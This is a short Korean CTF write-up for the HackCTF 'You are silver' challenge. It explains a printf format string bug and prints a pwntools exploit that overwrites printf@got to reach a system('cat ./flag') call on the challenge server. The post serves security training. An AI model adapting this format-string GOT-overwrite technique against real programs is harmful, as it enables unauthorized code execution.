ii4gsp
HackCTF - You are silver 본문
main()함수를 보면 printf()함수에서 FSB취약점이 발생한다.
play_game()함수에 system("cat ./flag"); 가 있다.
system()함수를 호출하기전 인자 0x400750을 printf@got에 덮어주면 된다.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3022)
e = ELF('/home/ii4gsp/HackCTF/you_are_silver')
flag = str(0x400750)
printf_got = e.got['printf']
payload = ''
payload += '%' + flag + 'x%8$ln'
payload += '\x90' * 2
payload += p64(printf_got)
r.sendline(payload)
r.interactive()
'시스템 해킹 > HackCTF' 카테고리의 다른 글
HackCTF - SysROP (0) | 2020.05.05 |
---|---|
HackCTF - Unexploitable #1 (0) | 2020.05.05 |
HackCTF - ROP (0) | 2020.02.21 |
HackCTF - UAF (0) | 2020.02.19 |
HackCTF - Pwning (0) | 2020.02.19 |
Comments